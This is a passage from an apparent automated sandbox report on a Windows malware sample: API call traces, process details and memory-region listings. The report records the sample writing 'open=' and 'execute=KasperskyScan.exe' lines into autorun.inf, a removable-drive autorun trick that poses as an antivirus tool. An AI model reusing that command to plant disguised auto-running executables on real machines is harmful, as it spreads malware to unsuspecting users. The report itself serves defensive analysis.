lpDistanceToMoveHigh=0x19fc6c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19fc6c*=0) returned 0xb [0146.297] ReadFile (in: hFile=0x3c, lpBuffer=0x19fc70, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x19fc60, lpOverlapped=0x0 | out: lpBuffer=0x19fc70*, lpNumberOfBytesRead=0x19fc60*=0x1, lpOverlapped=0x0) returned 1 [0146.298] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0146.298] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0146.298] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0146.298] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0146.298] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0146.298] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0146.298] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0146.298] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0146.298] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0146.298] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0146.298] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0146.299] GetProcessHeap () returned 0x660000 [0146.299] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x6c) returned 0x66abd8 [0146.301] GetProcessHeap () returned 0x660000 [0146.301] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x66abd8, Size=0x38) returned 0x66abd8 [0146.301] GetProcessHeap () returned 0x660000 [0146.301] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x66abd8) returned 0x38 [0146.301] GetProcessHeap () returned 0x660000 [0146.301] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x44) returned 0x66ac18 [0146.302] _vsnwprintf (in: _Buffer=0xd37940, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x19fa2c | out: _Buffer="open=KasperskyScan.exe \r\n") returned 25 [0146.302] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.302] GetFileType (hFile=0x3c) returned 0x1 [0146.302] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="open=KasperskyScan.exe \r\n", cchWideChar=-1, lpMultiByteStr=0xd3b960, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="open=KasperskyScan.exe \r\n", lpUsedDefaultChar=0x0) returned 26 [0146.302] WriteFile (in: hFile=0x3c, lpBuffer=0xd3b960*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x19fa1c, lpOverlapped=0x0 | out: lpBuffer=0xd3b960*, lpNumberOfBytesWritten=0x19fa1c*=0x19, lpOverlapped=0x0) returned 1 [0146.302] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0146.303] _close (_FileHandle=3) returned 0 [0146.303] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.303] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0146.304] _get_osfhandle (_FileHandle=1) returned 0x3c [0146.304] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0146.304] _get_osfhandle (_FileHandle=0) returned 0x38 [0146.304] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0146.304] SetConsoleInputExeNameW () returned 0x1 [0146.304] GetConsoleOutputCP () returned 0x1b5 [0146.305] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0146.305] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.305] exit (_Code=0) Thread: id = 20 os_tid = 0x10d0 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6f670000" os_pid = "0x864" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xb84" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 582 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 583 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 584 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 585 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 586 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 587 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 588 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 589 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 590 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 591 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 592 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 593 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 594 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 595 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 596 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 597 start_va = 0x90000 end_va = 0x14dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 598 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 599 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 600 start_va = 0x600000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 601 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 602 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 603 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 604 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 605 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 606 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 607 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 608 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 609 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 610 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 611 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 612 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 613 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 614 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 615 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 616 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 617 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 618 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 619 start_va = 0xb60000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 620 start_va = 0x1f60000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 621 start_va = 0x600000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 622 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 623 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 624 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 625 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 626 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 627 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 628 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 629 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 630 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 631 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 632 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 633 start_va = 0x2060000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 634 start_va = 0x2230000 end_va = 0x2566fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 635 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 636 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 637 start_va = 0x1d0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 638 start_va = 0x6a0000 end_va = 0x6f9fff monitored = 1 entry_point = 0x6b53f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 639 start_va = 0x2570000 end_va = 0x278efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 640 start_va = 0x2790000 end_va = 0x29a9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 641 start_va = 0x2060000 end_va = 0x2168fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 642 start_va = 0x2220000 end_va = 0x222ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 643 start_va = 0x29b0000 end_va = 0x2bc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 644 start_va = 0x2bd0000 end_va = 0x2cddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 645 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 646 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 647 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 648 start_va = 0x1f60000 end_va = 0x201bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f60000" filename = "" Region: id = 649 start_va = 0x2050000 end_va = 0x205ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 650 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 651 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 652 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 653 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 654 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 655 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 656 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 657 start_va = 0x1f0000 end_va = 0x1f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 658 start_va = 0x680000 end_va = 0x680fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 659 start_va = 0x6a0000 end_va = 0x6a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 660 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 661 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 662 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 16 os_tid = 0x108c Thread: id = 17 os_tid = 0x1090 Thread: id = 18 os_tid = 0x1358 Thread: id = 19 os_tid = 0x135c Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6f11d000" os_pid = "0x10d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C echo ^execute=^KasperskyScan^.exe >>autorun.inf" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 670 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 671 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 672 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 673 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 674 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 675 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 676 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 677 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 678 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 679 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 680 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 681 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 682 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 683 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 684 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 685 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 686 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 687 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 688 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 689 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 690 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 691 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 692 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 693 start_va = 0x4f0000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 694 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 695 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 696 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 697 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 778 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 779 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 780 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 781 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 782 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 783 start_va = 0x770000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 784 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 785 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 21 os_tid = 0xc24 [0147.181] GetModuleHandleA (lpModuleName=0x0) returned 0xd00000 [0147.181] __set_app_type (_Type=0x1) [0147.181] __p__fmode () returned 0x74ac4d6c [0147.181] 